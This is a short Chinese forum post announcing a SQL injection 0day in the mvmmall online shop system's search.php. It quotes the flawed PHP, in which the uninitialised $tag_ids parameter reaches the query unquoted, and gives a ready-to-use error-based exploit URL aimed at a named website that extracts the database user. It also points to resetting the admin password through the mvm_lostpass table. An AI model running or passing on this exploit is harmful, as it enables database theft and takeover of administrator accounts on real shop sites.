mvmmall网店商城系统注入漏洞
<P>mvmmall网店商城系统最新注入0day问题出在搜索search.php这个文件上。</P><P>代码如下:</P>
<P><?php<BR>require_once ‘include/common.inc.php’;<BR>require_once ROOTPATH.’header.php’;<BR>if($action!=’search’){<BR>$search_key = ”;<BR>if (isset($ps_search))<BR>{ //省略一堆东西<BR>$tag_ids = array(); //在if里<BR>//继续省略<BR>while ($row = $db->fetch_array($result)) {<BR>$tag_ids[] = $row['goods_id'];<BR>} //也是在if里<BR>}<BR>//省略一堆东西<BR>} //结束if里的东西<BR>//商品标签搜索<BR>$tag_ids = array_unique($tag_ids); //没有ps_search他就没初始化!可自行输入<BR>$tag_search = implode(‘,’,dhtmlchars($tag_ids)); //dhtmlchars过滤HTML标签不用理会<BR>$tag_search && $tag_search = “OR uid IN($tag_search)”; //呼…..成功了!<BR>//省略无关东西<BR>$search_sql = “WHERE upv = ’1′ AND up_date<=’$m_now_time’”.” AND (( 1 ” . $cat_search . $search_key . $brand_search . $min_search . $max_search .” ) “.$tag_search.” )”;//没有单引号的….<BR>$total_count = $db->counter($mvm_goods_table,$search_sql);</P>
<P>用ADMIN的用户和MALL后用找回密码功能 mvm_lostpass存放验证串直接改密码了。</P>
<P>测试EXP:</P>
<P>http://www.heimian.com/search.php?tag_ids=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20user())%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23</P>
页:
[1]